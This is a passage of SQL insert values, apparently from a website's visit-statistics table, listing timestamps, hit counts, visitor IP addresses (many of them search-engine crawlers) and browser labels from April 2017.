(100137,1492026111,1,1,0,0,'51.255.65.91','other'),(100138,1492026517,1,1,0,0,'51.255.65.77','other'),(100139,1492026954,2,2,0,0,'141.8.142.9','other'),(100140,1492026978,1,1,0,0,'141.8.142.49','other'),(100141,1492027049,2,2,0,0,'178.154.189.21','other'),(100142,1492027157,1,1,0,0,'37.9.113.1','other'),(100143,1492027230,2,2,0,0,'178.154.200.41','other'),(100144,1492027319,1,1,0,0,'93.158.152.36','other'),(100145,1492027373,3,3,0,0,'178.154.189.29','other'),(100146,1492027417,1,1,0,0,'141.8.142.28','other'),(100147,1492027420,1,0,1,0,'66.249.66.87',''),(100149,1492027511,1,1,0,0,'178.154.200.64','other'),(100150,1492027615,1,1,0,0,'141.8.142.48','other'),(100151,1492028038,1,1,0,0,'95.108.213.32','other'),(100152,1492028271,1,1,0,0,'164.132.161.95','other'),(100153,1492028414,1,1,0,0,'178.154.200.64','other'),(100154,1492028512,1,1,0,0,'178.154.200.41','other'),(100155,1492028642,1,1,0,0,'5.255.253.31','other'),(100156,1492028675,1,1,0,0,'216.244.66.237','other'),(100157,1492028864,1,1,0,0,'37.9.113.5','other'),(100158,1492028914,1,1,0,0,'93.158.152.42','other'),(100159,1492029110,1,1,0,0,'51.255.71.110','other'),(100160,1492029173,1,1,0,0,'217.182.132.78','other'),(100161,1492029278,1,1,0,0,'178.154.200.37','other'),(100162,1492029352,1,1,0,0,'141.8.142.97','other'),(100163,1492029443,1,1,0,0,'93.158.152.59','other'),(100164,1492029447,1,1,0,0,'141.8.142.42','other'),(100165,1492029562,1,1,0,0,'178.154.200.64','other'),(100166,1492029598,1,1,0,0,'178.154.189.14','other'),(100167,1492030073,1,1,0,0,'37.9.113.5','other'),(100168,1492030164,1,0,1,0,'66.249.76.107',''),(100169,1492030494,1,1,0,0,'5.255.253.81','other'),(100170,1492030569,2,2,0,0,'141.8.142.154','other'),(100171,1492030657,2,2,0,0,'91.209.11.236','other'),(100172,1492030714,1,1,0,0,'178.154.189.16','other'),(100173,1492030955,1,1,0,0,'51.255.65.57','other'),(100174,1492030993,1,1,0,0,'51.255.71.122','other'),(100175,1492031012,1,1,0,0,'217.182.132.183','other'),(100176,1492031073,1,1,0,0,'164.132.161.37','other'),(100177,1492031310,1,1,0,0,'51.255.65.87','other'),(100178,1492031433,1,1,0,0,'141.8.142.48','other'),(100179,1492031434,2,2,0,0,'5.255.253.43','other'),(100180,1492031678,1,1,0,0,'178.154.200.41','other'),(100181,1492031733,1,1,0,0,'141.8.142.9','other'),(100182,1492031788,1,1,0,0,'93.158.152.59','other'),(100183,1492031846,2,2,0,0,'141.8.142.28','other'),(100184,1492031851,1,1,0,0,'164.132.161.39','other'),(100185,1492032144,1,1,0,0,'37.9.113.46','other'),(100186,1492032537,1,0,1,0,'66.249.76.107',''),(100187,1492032593,2,2,0,0,'93.158.152.36','other'),(100188,1492032641,1,1,0,0,'217.182.132.6','other'),(100189,1492032699,1,1,0,0,'93.158.152.77','other'),(100190,1492032755,1,1,0,0,'8.29.198.26','other'),(100191,1492032758,1,1,0,0,'137.74.207.114','other'),(100192,1492032912,1,1,0,0,'51.255.65.88','other'),(100193,1492032916,2,2,0,0,'93.158.152.42','other'),(100194,1492032968,1,1,0,0,'164.132.161.12','other'),(100195,1492033006,1,1,0,0,'141.8.142.38','other'),(100196,1492033240,1,1,0,0,'164.132.162.155','other'),(100197,1492033260,1,1,0,0,'178.154.189.29','other'),(100198,1492033571,2,2,0,0,'141.8.132.43','other'),(100199,1492034130,1,1,0,0,'5.255.253.81','other'),(100200,1492034197,1,1,0,0,'164.132.161.65','other'),(100201,1492034252,1,1,0,0,'93.158.152.59','other'),(100202,1492034480,1,1,0,0,'178.154.189.21','other'),(100203,1492034636,1,1,0,0,'141.8.142.48','other'),(100204,1492034731,1,1,0,0,'141.8.142.38','other'),(100205,1492034950,1,1,0,0,'178.154.200.41','other'),(100206,1492035083,1,1,0,0,'51.255.71.126','other'),(100207,1492035121,1,1,0,0,'178.154.200.60','other'),(100208,1492035123,2,2,0,0,'5.255.253.31','other'),(100209,1492035499,1,1,0,0,'178.154.189.21','other'),(100210,1492035842,1,1,0,0,'164.132.161.42','other'),(100211,1492035875,1,1,0,0,'178.154.189.14','other'),(100212,1492035878,2,2,0,0,'178.154.200.37','other'),(100213,1492035889,1,1,0,0,'91.209.11.236','other'),(100214,1492036269,1,1,0,0,'51.255.65.43','other'),(100215,1492036388,1,1,0,0,'51.255.65.224','other'),(100216,1492036451,2,2,0,0,'93.158.152.59','other'),(100217,1492036875,1,1,0,0,'164.132.161.57','other'),(100218,1492037666,1,1,0,0,'164.132.161.33','other'),(100219,1492038524,1,1,0,0,'217.182.132.63','other'),(100220,1492038627,1,1,0,0,'51.255.65.47','other'),(100221,1492039223,1,0,1,0,'66.249.76.109',''),(100222,1492040799,1,1,0,0,'217.182.132.186','other'),(100223,1492041974,1,1,0,0,'51.255.65.57','other'),(100224,1492042015,1,1,0,0,'164.132.161.37','other'),(100225,1492042152,1,1,0,0,'217.182.132.53','other'),(100226,1492042201,1,1,0,0,'51.255.65.25','other'),(100227,1492043174,1,1,0,0,'164.132.164.180','other'),(100228,1492043177,1,1,0,0,'164.132.161.22','other'),(100229,1492043207,1,1,0,0,'51.255.65.50','other'),(100230,1492043372,2,0,2,0,'68.180.229.99',''),(100231,1492043594,1,1,0,0,'8.29.198.27','other'),(100232,1492044244,1,0,1,0,'40.77.167.125',''),(100233,1492044573,1,1,0,0,'51.255.65.14','other'),(100234,1492045707,1,0,1,0,'207.46.13.212',''),(100235,1492045855,1,1,0,0,'217.182.132.75','other'),(100236,1492046065,1,1,0,0,'164.132.161.53','other'),(100237,1492046088,1,1,0,0,'51.255.65.2','other'),(100238,1492046104,1,1,0,0,'40.77.167.125','other'),(100239,1492046502,1,1,0,0,'51.255.65.66','other'),(100240,1492046671,1,1,0,0,'217.182.132.55','other'),(100241,1492047340,1,1,0,0,'164.132.161.20','other'),(100242,1492047800,1,1,0,0,'164.132.161.31','other'),(100243,1492048080,1,1,0,0,'164.132.161.71','other'),(100244,1492048092,1,1,0,0,'51.255.65.75','other'),(100245,1492048644,1,0,1,0,'66.249.76.29',''),(100246,1492049159,1,1,0,0,'40.77.167.90','other'),(100247,1492049214,1,1,0,0,'164.132.161.27','other'),(100248,1492049461,1,1,0,0,'164.132.161.53','other'),(100249,1492049594,1,1,0,0,'51.255.71.100','other'),(100250,1492050420,1,1,0,0,'51.255.65.32','other'),(100251,1492052008,1,1,0,0,'51.255.65.40','other'),(100252,1492052203,1,0,1,0,'66.249.76.108',''),(100253,1492052408,1,1,0,0,'137.74.207.120','other'),(100254,1492052823,1,1,0,0,'164.132.161.45','other'),(100255,1492053664,1,1,0,0,'164.132.161.93','other'),(100256,1492054288,1,1,0,0,'157.55.39.84','other'),(100257,1492054428,1,1,0,0,'8.29.198.26','other'),(100258,1492055084,1,1,0,0,'217.182.132.152','other'),(100259,1492055360,1,1,0,0,'164.132.161.50','other'),(100260,1492056006,1,1,0,0,'164.132.161.47','other'),(100261,1492057509,1,1,0,0,'66.249.76.108','chrome'),(100262,1492057573,1,1,0,0,'66.249.76.107','chrome'),(100263,1492057695,1,1,0,0,'51.255.65.34','other'),(100264,1492059388,1,1,0,0,'137.74.207.161','other'),(100265,1492059469,1,1,0,0,'217.182.132.19','other'),(100266,1492059634,1,1,0,0,'91.196.178.69','firefox'),(100267,1492060214,1,1,0,0,'51.255.65.56','other'),(100268,1492060321,1,1,0,0,'164.132.161.69','other'),(100269,1492060447,1,1,0,0,'46.188.32.37','chrome'),(100271,1492060449,1,1,0,0,'176.195.104.112','opera'),(100272,1492060456,1,1,0,0,'188.32.227.180','opera'),(100273,1492060802,2,2,0,0,'51.255.64.106','other'),(100274,1492061093,1,0,1,0,'207.46.13.70',''),(100275,1492061104,1,1,0,0,'217.182.132.96','other'),(100276,1492061598,1,1,0,0,'66.102.9.59','chrome'),(100277,1492061904,1,1,0,0,'207.46.13.70','other'),(100278,1492061911,1,1,0,0,'164.132.161.30','other'),(100279,1492061920,1,1,0,0,'91.196.178.35','chrome'),(100280,1492062731,1,1,0,0,'164.132.162.155','other'),(100281,1492062900,1,1,0,0,'91.196.178.39','chrome'),(100282,1492062932,1,1,0,0,'51.255.65.36','other'),(100283,1492063054,1,1,0,0,'51.255.65.12','other'),(100284,1492063211,1,1,0,0,'91.196.178.68','firefox'),(100285,1492063307,1,1,0,0,'180.76.15.8','other'),(100286,1492063627,1,1,0,0,'46.201.240.112','firefox'),(100287,1492064570,1,1,0,0,'82.207.91.234','firefox'),(100288,1492065130,1,1,0,0,'51.255.71.113','other'),(100289,1492065270,1,1,0,0,'8.29.198.26','other'),(100290,1492065294,2,2,0,0,'91.196.178.72','firefox'),(100291,1492065624,1,1,0,0,'51.255.65.89','other'),(100292,1492066073,2,2,0,0,'164.132.161.6','other'),(100293,1492066285,1,1,0,0,'164.132.161.14','other'),(100294,1492066662,1,1,0,0,'164.132.161.85','other'),(100295,1492066854,1,1,0,0,'130.180.218.79','firefox'),(100296,1492066869,1,1,0,0,'91.196.178.68','chrome'),(100297,1492066885,1,1,0,0,'95.108.213.34','other'),(100298,1492067132,1,1,0,0,'51.255.65.224','other'),(100299,1492067183,1,1,0,0,'94.178.107.60','chrome'),(100300,1492067387,1,1,0,0,'91.196.178.72','firefox'),(100301,1492067740,2,2,0,0,'91.196.178.168','chrome'),(100302,1492068129,1,0,1,0,'66.249.76.27',''),(100303,1492068194,2,2,0,0,'5.153.161.170','chrome'),(100304,1492068207,1,1,0,0,'185.76.69.18','chrome'),(100305,1492068624,1,1,0,0,'51.255.65.23','other'),(100306,1492068654,1,1,0,0,'151.80.27.116','other'),(100307,1492069170,1,1,0,0,'51.255.65.54','other'),(100308,1492069282,1,1,0,0,'66.249.93.205','chrome'),(100309,1492069747,1,1,0,0,'94.179.126.222','chrome'),(100310,1492071228,1,0,1,0,'66.249.76.107',''),(100311,1492071534,1,1,0,0,'51.255.65.41','other'),(100312,1492071781,1,0,1,0,'66.249.66.180',''),(100313,1492071951,1,1,0,0,'180.76.15.20','other'),(100314,1492072254,1,1,0,0,'51.255.65.69','other'),(100315,1492072259,1,1,0,0,'91.196.178.66','firefox'),(100316,1492072439,1,1,0,0,'91.196.178.65','firefox'),(100317,1492072510,1,1,0,0,'164.132.161.37','other'),(100318,1492072727,1,1,0,0,'51.255.65.54','other'),(100319,1492072883,1,0,1,0,'207.46.13.30',''),(100320,1492073030,1,1,0,0,'217.182.132.177','other'),(100321,1492073219,1,1,0,0,'91.196.178.71','chrome'),(100322,1492074008,1,1,0,0,'91.196.178.65','firefox'),(100323,1492074100,1,1,0,0,'51.255.65.30','other'),(100324,1492075339,1,1,0,0,'164.132.161.31','other'),(100325,1492075588,1,1,0,0,'91.196.178.65','firefox'),(100326,1492075909,1,1,0,0,'91.196.178.67','firefox'),(100327,1492076105,1,1,0,0,'8.29.198.27','other'),(100328,1492076432,1,1,0,0,'164.132.161.92','other'),(100329,1492076460,1,1,0,0,'164.132.161.80','other'),(100330,1492077063,1,1,0,0,'217.182.132.174','other'),(100331,1492077269,1,1,0,0,'164.132.161.52','other'),(100332,1492077638,2,1,1,0,'66.249.76.28',''),(100333,1492077829,1,1,0,0,'51.255.65.72','other'),(100334,1492078030,1,1,0,0,'137.74.207.109','other'),(100335,1492078138,1,1,0,0,'46.98.176.199','other'),(100336,1492078514,1,1,0,0,'51.255.71.119','other'),(100337,1492078560,1,1,0,0,'137.74.207.120','other'),(100338,1492079390,1,1,0,0,'82.207.96.172','chrome'),(100339,1492079414,1,1,0,0,'164.132.161.79','other'),(100340,1492080746,1,1,0,0,'51.255.71.128','other'),(100341,1492081487,1,1,0,0,'40.77.167.88','other'),(100342,1492081561,1,1,0,0,'217.182.132.94','other'),(100343,1492081950,1,1,0,0,'137.74.207.116','other'),(100344,1492082007,1,1,0,0,'51.255.71.128','other'),(100345,1492082455,1,1,0,0,'66.249.76.108','chrome'),(100346,1492082481,1,1,0,0,'208.43.225.84','other'),(100347,1492082614,1,1,0,0,'91.196.178.65','firefox'),(100348,1492082846,1,1,0,0,'217.182.132.18','other'),(100349,1492082941,2,2,0,0,'46.201.79.245','opera'),(100350,1492083379,1,1,0,0,'164.132.161.30','other'),(100351,1492083908,1,1,0,0,'164.132.161.23','other'),(100352,1492084562,1,1,0,0,'217.182.132.188','other'),(100353,1492084579,1,1,0,0,'51.255.65.89','other'),(100354,1492085369,1,1,0,0,'94.179.10.141','chrome'),(100355,1492085627,2,2,0,0,'91.196.178.66','firefox'),(100356,1492086409,1,0,1,0,'40.77.167.88',''),(100357,1492086851,1,1,0,0,'91.196.178.72','other'),(100358,1492086879,1,1,0,0,'137.74.207.116','other'),(100359,1492086943,1,1,0,0,'8.29.198.25','other'),(100360,1492087124,1,1,0,0,'195.49.151.99','chrome'),(100361,1492087558,1,1,0,0,'51.255.65.10','other'),(100362,1492087560,1,1,0,0,'46.200.125.231','firefox'),(100363,1492087857,1,1,0,0,'51.255.65.23','other'),(100364,1492087876,1,1,0,0,'91.196.178.168','chrome'),(100365,1492088494,1,1,0,0,'207.46.13.30','other'),(100366,1492088612,1,1,0,0,'5.153.161.170','opera'),(100367,1492088859,116,116,0,0,'92.238.226.245','other'),(100368,1492088860,1,1,0,0,'207.46.13.34','other'),(100369,1492089440,1,1,0,0,'164.132.161.45','other'),(100370,1492089583,1,1,0,0,'164.132.161.40','other'),(100371,1492089599,1,0,1,0,'66.249.76.27',''),(100372,1492089843,1,1,0,0,'91.196.178.168','chrome'),(100373,1492089958,1,1,0,0,'91.196.178.72','other'),(100374,1492090088,1,1,0,0,'51.255.71.118','other'),(100375,1492090521,1,1,0,0,'212.87.168.24','chrome'),(100376,1492090536,1,1,0,0,'141.8.142.15','other'),(100377,1492090542,1,1,0,0,'137.74.207.170','other'),(100378,1492090881,1,1,0,0,'95.132.47.222','firefox'),(100379,1492091400,1,1,0,0,'164.132.161.22','other'),(100380,1492091421,1,1,0,0,'91.224.96.187','chrome'),(100381,1492092012,1,1,0,0,'51.255.65.35','other'),(100382,1492093290,1,1,0,0,'164.132.161.28','other'),(100383,1492093508,1,1,0,0,'164.132.161.30','other'),(100384,1492093629,1,1,0,0,'164.132.162.157','other'),(100385,1492093712,1,1,0,0,'40.77.167.114','other'),(100386,1492094796,1,0,1,0,'66.249.76.109',''),(100387,1492096693,1,1,0,0,'213.186.202.241','chrome'),(100388,1492097783,1,1,0,0,'8.29.198.25','other'),(100389,1492102374,1,1,0,0,'94.254.243.55','chrome'),(100390,1492103660,1,0,1,0,'40.77.167.10',''),(100391,1492104314,1,1,0,0,'207.46.13.139','other'),(100392,1492104324,1,1,0,0,'91.196.178.103','chrome'),(100393,1492106320,1,1,0,0,'91.196.178.67','chrome'),(100394,1492107401,1,1,0,0,'95.108.213.7','other'),(100395,1492108613,1,1,0,0,'8.29.198.25','other'),(100396,1492109389,1,1,0,0,'91.196.178.162','chrome'),(100397,1492110349,1,0,1,0,'66.249.76.28',''),(100398,1492110480,1,0,1,0,'68.180.229.231',''),(100399,1492111796,1,1,0,0,'37.55.58.181','chrome'),(100400,1492112863,1,0,1,0,'40.77.167.83',''),(100401,1492115406,1,0,1,0,'66.249.66.177',''),(100402,1492115516,48,48,0,0,'85.144.181.178','other'),(100403,1492119441,1,1,0,0,'8.29.198.27','other'),(100404,1492125688,1,1,0,0,'180.76.15.157','other'),(100405,1492125846,1,1,0,0,'5.9.89.170','other'),(100406,1492130100,1,1,0,0,'180.76.15.154','other'),(100407,1492130270,1,1,0,0,'8.29.198.26','other'),(100408,1492132468,1,1,0,0,'64.246.161.30','firefox'),(100409,1492132848,1,0,1,0,'66.249.76.29',''),(100410,1492133086,1,1,0,0,'216.244.66.237','other'),(100411,1492133433,1,1,0,0,'176.193.101.164','msie'),(100412,1492134838,1,0,1,0,'66.249.76.28',''),(100413,1492135130,1,0,1,0,'66.249.76.107',''),(100414,1492135904,1,1,0,0,'66.102.9.35','chrome'),(100415,1492136470,1,0,1,0,'66.249.76.109',''),(100416,1492137565,1,0,1,0,'66.249.76.108',''),(100417,1492139187,1,0,1,0,'66.249.66.183',''),(100418,1492141145,1,1,0,0,'8.29.198.26','other'),(100419,1492143663,1,0,1,0,'157.55.39.83',''),(100420,1492145204,1,1,0,0,'91.196.178.71','firefox'),(100421,1492146359,1,1,0,0,'141.8.142.15','other'),(100422,1492146362,1,1,0,0,'5.255.253.63','other'),(100423,1492146366,1,1,0,0,'178.154.200.37','other'),(100424,1492146512,1,0,1,0,'66.249.76.27',''),(100425,1492147669,1,1,0,0,'217.69.133.2','other'),(100426,1492147817,1,1,0,0,'217.69.133.9','other'),(100427,1492148183,1,1,0,0,'66.102.9.25','chrome'),(100428,1492148961,1,1,0,0,'91.196.178.37','chrome'),(100429,1492149192,1,1,0,0,'173.252.88.86','other'),(100430,1492149195,1,1,0,0,'173.252.90.164','other'),(100431,1492149197,1,1,0,0,'173.252.123.185','other'),(100432,1492149199,1,1,0,0,'173.252.98.24','other'),(100433,1492150498,16,16,0,0,'173.212.204.146','other'),(100434,1492150758,1,0,1,0,'40.77.167.15',''),(100435,1492151184,1,1,0,0,'217.69.133.215','other'),(100436,1492151218,1,1,0,0,'217.69.133.70','other'),(100437,1492151396,2,2,0,0,'217.69.133.232','other'),(100438,1492151422,1,1,0,0,'82.207.91.234','firefox'),(100439,1492151709,1,1,0,0,'217.69.133.236','other'),(100440,1492151788,1,1,0,0,'91.196.178.65','firefox'),(100441,1492151982,1,1,0,0,'8.29.198.25','other'),(100442,1492152519,1,0,1,0,'66.249.66.87',''),(100443,1492152767,1,1,0,0,'91.196.178.65','firefox'),(100444,1492152821,1,1,0,0,'95.108.179.15','other'),(100445,1492153062,1,1,0,0,'82.207.91.234','firefox'),(100446,1492153225,1,1,0,0,'66.249.93.155','chrome'),(100447,1492153362,1,0,1,0,'66.249.76.109',''),(100448,1492153725,1,1,0,0,'37.53.224.5','chrome'),(100449,1492154285,1,1,0,0,'91.196.178.68','chrome'),(100450,1492154329,1,1,0,0,'91.196.178.65','firefox'),(100451,1492154734,2,2,0,0,'62.210.103.36','other'),(100452,1492154883,1,1,0,0,'180.76.15.143','other'),(100454,1492154990,1,0,1,0,'66.249.76.108',''),(100455,1492155979,1,0,1,0,'66.249.66.87',''),(100456,1492156022,1,1,0,0,'217.69.136.208','other'),(100457,1492156274,1,1,0,0,'178.95.66.40','firefox'),(100458,1492156323,1,1,0,0,'91.196.178.65','firefox'),(100459,1492156689,1,1,0,0,'217.69.133.219','other'),(100460,1492156825,1,1,0,0,'91.196.178.71','firefox'),(100461,1492156853,1,0,1,0,'40.77.167.135',''),(100462,1492156987,1,1,0,0,'217.69.136.206','other'),(100463,1492157516,1,1,0,0,'217.69.133.224','other'),(100464,1492157518,1,1,0,0,'217.69.133.225','other'),(100465,1492158912,1,1,0,0,'91.196.178.162','chrome'),(100466,1492159824,1,1,0,0,'37.73.242.160','chrome'),(100467,1492160220,1,1,0,0,'91.196.178.71','firefox'),(100468,1492160480,1,1,0,0,'91.196.178.65','firefox'),(100469,1492161295,1,1,0,0,'217.69.133.230','other'),(100470,1492161734,48,48,0,0,'85.144.181.178','other'),(100471,1492162426,1,1,0,0,'217.69.133.67','other'),(100472,1492162491,1,1,0,0,'91.196.178.65','firefox'),(100473,1492162814,1,1,0,0,'8.29.198.27','other'),(100474,1492162970,1,1,0,0,'217.69.133.227','other'),(100475,1492163029,1,1,0,0,'91.196.178.72','other'),(100476,1492163083,1,1,0,0,'217.69.133.234','other'),(100477,1492163189,1,1,0,0,'217.69.133.239','other'),(100478,1492163191,1,1,0,0,'217.69.133.240','other'),(100479,1492163272,3,3,0,0,'91.196.178.70','firefox'),(100480,1492163664,1,1,0,0,'91.196.178.70','chrome'),(100481,1492164629,1,1,0,0,'91.196.177.15','chrome'),(100482,1492164824,2,2,0,0,'217.69.133.4','other'),(100483,1492165488,1,1,0,0,'217.69.133.3','other'),(100484,1492167351,1,1,0,0,'217.69.136.210','other'),(100485,1492167568,1,1,0,0,'217.69.133.232','other'),(100486,1492167639,1,1,0,0,'217.69.133.229','other'),(100487,1492168861,1,1,0,0,'40.77.167.15','other'),(100488,1492169215,1,1,0,0,'217.69.133.239','other'),(100489,1492169437,1,0,1,0,'66.249.66.81',''),(100490,1492169563,1,1,0,0,'91.196.178.34','chrome'),(100491,1492170403,1,1,0,0,'91.209.11.236','other'),(100492,1492172334,1,1,0,0,'217.69.133.230','other'),(100493,1492173009,1,1,0,0,'217.69.133.221','other'),(100494,1492173049,1,1,0,0,'217.69.136.209','other'),(100495,1492173085,1,1,0,0,'217.69.136.210','other'),(100496,1492173370,1,1,0,0,'217.69.136.206','other'),(100497,1492173643,1,1,0,0,'8.29.198.25','other'),(100498,1492174123,1,1,0,0,'217.69.136.204','other'),(100499,1492174189,1,1,0,0,'217.69.133.70','other'),(100500,1492174327,1,1,0,0,'216.244.66.237','other'),(100501,1492174362,1,1,0,0,'217.69.133.223','other'),(100502,1492174383,1,1,0,0,'217.69.133.237','other'),(100503,1492175587,1,1,0,0,'40.77.167.25','other'),(100504,1492175722,1,0,1,0,'66.249.76.107',''),(100505,1492176035,1,1,0,0,'180.76.15.13','other'),(100506,1492177010,1,1,0,0,'82.207.91.234','firefox'),(100507,1492177145,1,1,0,0,'40.77.167.25','other'),(100508,1492177765,2,2,0,0,'91.200.12.43','msie'),(100509,1492177915,1,0,1,0,'66.249.76.29',''),(100510,1492177918,1,1,0,0,'66.249.76.109','chrome'),(100511,1492178023,1,1,0,0,'217.69.133.69','other'),(100512,1492178698,1,1,0,0,'217.182.132.34','other'),(100513,1492179098,1,1,0,0,'217.182.132.84','other'),(100514,1492179253,1,1,0,0,'51.255.71.113','other'),(100515,1492179769,1,1,0,0,'217.69.133.216','other'),(100516,1492179771,2,2,0,0,'217.69.133.215','other'),(100517,1492179896,1,1,0,0,'217.182.132.71','other'),(100518,1492179912,1,1,0,0,'66.249.76.108','chrome'),(100519,1492180106,1,1,0,0,'217.69.133.84','other'),(100520,1492180757,1,1,0,0,'217.69.133.231','other'),(100521,1492180928,1,1,0,0,'217.69.133.240','other'),(100522,1492182412,1,1,0,0,'40.77.167.25','other'),(100523,1492183183,1,1,0,0,'217.69.133.2','other'),(100524,1492183949,1,1,0,0,'217.182.132.24','other'),(100525,1492184474,1,1,0,0,'8.29.198.26','other'),(100526,1492184620,1,1,0,0,'37.55.226.156','firefox'),(100527,1492184765,1,1,0,0,'180.76.15.156','other'),(100528,1492184824,1,1,0,0,'91.196.178.163','chrome'),(100529,1492184947,1,1,0,0,'164.132.161.4','other'),(100530,1492185479,1,1,0,0,'217.69.133.222','other'),(100531,1492185523,1,1,0,0,'66.249.76.109','chrome'),(100532,1492185582,1,1,0,0,'217.182.132.72','other'),(100533,1492185591,1,1,0,0,'217.69.133.217','other'),(100534,1492185593,1,1,0,0,'217.69.133.215','other'),(100535,1492185595,1,1,0,0,'217.69.133.216','other'),(100536,1492185624,1,0,1,0,'40.77.167.86',''),(100537,1492186165,1,1,0,0,'217.182.132.55','other'),(100538,1492186435,1,1,0,0,'216.244.66.237','other'),(100539,1492187143,1,1,0,0,'217.182.132.241','other'),(100540,1492187220,1,1,0,0,'51.255.65.5','other'),(100541,1492187342,1,1,0,0,'164.132.161.91','other'),(100542,1492187450,1,1,0,0,'217.69.133.227','other'),(100543,1492187451,1,1,0,0,'217.69.133.230','other'),(100544,1492187948,1,1,0,0,'164.132.161.39','other'),(100545,1492188321,1,1,0,0,'164.132.161.60','other'),(100546,1492188716,1,1,0,0,'66.249.66.177','chrome'),(100547,1492188724,1,1,0,0,'216.244.66.237','other'),(100548,1492188825,1,1,0,0,'164.132.161.87','other'),(100549,1492188929,1,1,0,0,'217.69.133.203','other'),(100550,1492189865,1,1,0,0,'217.69.133.218','other'),(100551,1492190432,1,1,0,0,'51.255.65.55','other'),(100552,1492190499,1,1,0,0,'51.255.65.2','other'),(100553,1492190532,1,1,0,0,'164.132.161.27','other'),(100554,1492190653,1,1,0,0,'217.182.132.7','other'),(100555,1492191153,1,1,0,0,'217.69.136.210','other'),(100556,1492191220,1,1,0,0,'217.69.133.220','other'),(100557,1492191333,1,1,0,0,'217.182.132.92','other'),(100558,1492191411,1,1,0,0,'217.182.132.57','other'),(100559,1492191462,1,1,0,0,'164.132.161.61','other'),(100560,1492191633,1,1,0,0,'51.255.65.2','other'),(100561,1492191666,1,1,0,0,'217.182.132.148','other'),(100562,1492192363,1,1,0,0,'217.69.133.70','other'),(100563,1492192592,1,1,0,0,'51.255.65.69','other'),(100564,1492192604,1,1,0,0,'217.69.136.205','other'),(100565,1492192686,1,1,0,0,'164.132.161.55','other'),(100566,1492192909,1,1,0,0,'137.74.207.114','other'),(100567,1492193611,1,0,1,0,'66.249.76.107',''),(100568,1492193678,1,0,1,0,'66.249.66.177',''),(100569,1492194061,1,1,0,0,'51.255.65.93','other'),(100570,1492194321,1,1,0,0,'40.77.167.25','other'),(100571,1492194573,1,1,0,0,'217.182.132.171','other'),(100572,1492194698,1,1,0,0,'217.69.133.4','other'),(100573,1492194707,1,1,0,0,'217.69.133.6','other'),(100574,1492194829,1,1,0,0,'217.69.133.5','other'),(100575,1492194839,1,1,0,0,'217.182.132.80','other'),(100576,1492194928,1,1,0,0,'51.255.65.31','other'),(100577,1492195113,1,1,0,0,'217.182.132.59','other'),(100578,1492195307,1,1,0,0,'8.29.198.26','other'),(100579,1492195387,1,1,0,0,'217.182.132.61','other'),(100580,1492195612,1,1,0,0,'164.132.161.75','other'),(100581,1492196070,1,1,0,0,'217.182.132.32','other'),(100582,1492196159,1,1,0,0,'217.69.134.177','other'),(100583,1492196225,1,1,0,0,'164.132.161.19','other'),(100584,1492196229,1,1,0,0,'91.196.178.39','chrome'),(100585,1492196900,1,1,0,0,'217.69.133.219','other'),(100586,1492196903,1,1,0,0,'217.69.133.216','other'),(100587,1492197159,1,0,1,0,'66.249.66.177',''),(100588,1492197180,1,1,0,0,'217.182.132.27','other'),(100589,1492198131,1,1,0,0,'51.255.65.6','other'),(100590,1492198255,2,2,0,0,'217.69.133.234','other'),(100591,1492198324,1,0,1,0,'66.249.66.81',''),(100592,1492198459,1,1,0,0,'217.69.133.236','other'),(100593,1492198605,1,1,0,0,'51.255.65.41','other'),(100594,1492199418,1,1,0,0,'91.196.178.72','firefox'),(100595,1492199542,1,1,0,0,'51.255.71.100','other'),(100596,1492200446,1,1,0,0,'137.74.207.164','other'),(100597,1492200701,1,1,0,0,'217.69.133.194','other'),(100598,1492200993,1,1,0,0,'217.182.132.31','other'),(100599,1492201870,2,2,0,0,'217.69.133.215','other'),(100600,1492201940,1,1,0,0,'217.182.132.79','other'),(100601,1492201954,1,1,0,0,'217.69.133.228','other'),(100602,1492202513,1,1,0,0,'217.182.132.176','other'),(100603,1492202788,1,1,0,0,'217.69.133.68','other'),(100604,1492203037,1,1,0,0,'217.69.133.239','other'),(100605,1492203233,1,1,0,0,'137.74.207.101','other'),(100606,1492203243,1,1,0,0,'217.182.132.157','other'),(100607,1492203540,1,1,0,0,'91.209.11.236','other'),(100608,1492203810,1,1,0,0,'217.182.132.16','other'),(100609,1492203860,1,1,0,0,'217.182.132.53','other'),(100610,1492203906,1,1,0,0,'51.255.65.62','other'),(100611,1492204413,1,1,0,0,'217.182.132.88','other'),(100612,1492204525,1,1,0,0,'217.69.133.3','other'),(100613,1492204831,1,1,0,0,'217.182.132.80','other'),(100614,1492205773,1,1,0,0,'51.255.65.31','other'),(100615,1492205830,1,1,0,0,'217.182.132.74','other'),(100616,1492206102,1,1,0,0,'217.182.132.53','other'),(100617,1492206136,1,1,0,0,'8.29.198.25','other'),(100618,1492206722,1,1,0,0,'164.132.161.69','other'),(100619,1492206937,1,1,0,0,'51.255.71.114','other'),(100620,1492206988,1,1,0,0,'217.182.132.179','other'),(100621,1492207619,1,1,0,0,'164.132.161.87','other'),(100622,1492207760,1,1,0,0,'217.69.133.69','other'),(100623,1492207762,1,1,0,0,'217.69.133.231','other'),(100624,1492207778,1,1,0,0,'95.221.208.9','msie'),(100625,1492208408,1,1,0,0,'217.69.133.221','other'),(100626,1492208479,1,1,0,0,'157.55.39.62','other'),(100627,1492208755,11,11,0,0,'69.58.178.58','other'),(100628,1492208833,1,1,0,0,'217.69.133.240','other'),(100629,1492208925,1,1,0,0,'164.132.161.41','other'),(100630,1492209592,2,0,2,0,'66.249.76.107',''),(100631,1492209611,1,1,0,0,'164.132.161.48','other'),(100632,1492210208,1,1,0,0,'217.69.133.3','other'),(100633,1492210793,1,1,0,0,'217.69.133.238','other'),(100634,1492210796,1,1,0,0,'217.69.133.239','other'),(100635,1492210955,1,1,0,0,'164.132.161.36','other'),(100636,1492212095,1,1,0,0,'164.132.161.65','other'),(100637,1492212179,1,1,0,0,'217.69.133.5','other'),(100638,1492212294,1,1,0,0,'164.132.161.91','other'),(100639,1492212376,2,0,2,0,'66.249.76.27',''),(100640,1492213341,1,1,0,0,'217.69.136.206','other'),(100641,1492213566,1,1,0,0,'217.182.132.73','other'),(100642,1492213580,1,1,0,0,'164.132.161.15','other'),(100643,1492213610,1,1,0,0,'164.132.161.26','other'),(100644,1492213629,1,1,0,0,'217.69.136.208','other'),(100645,1492213706,1,1,0,0,'51.255.65.47','other'),(100646,1492214697,1,1,0,0,'217.69.136.204','other'),(100647,1492214699,1,1,0,0,'217.69.136.205','other'),(100648,1492215149,1,1,0,0,'51.255.65.33','other'),(100649,1492215214,1,0,1,0,'66.249.76.107',''),(100650,1492215344,1,1,0,0,'141.8.132.72','other'),(100651,1492215639,1,0,1,0,'66.249.76.108',''),(100652,1492215845,1,1,0,0,'51.255.65.79','other'),(100653,1492215966,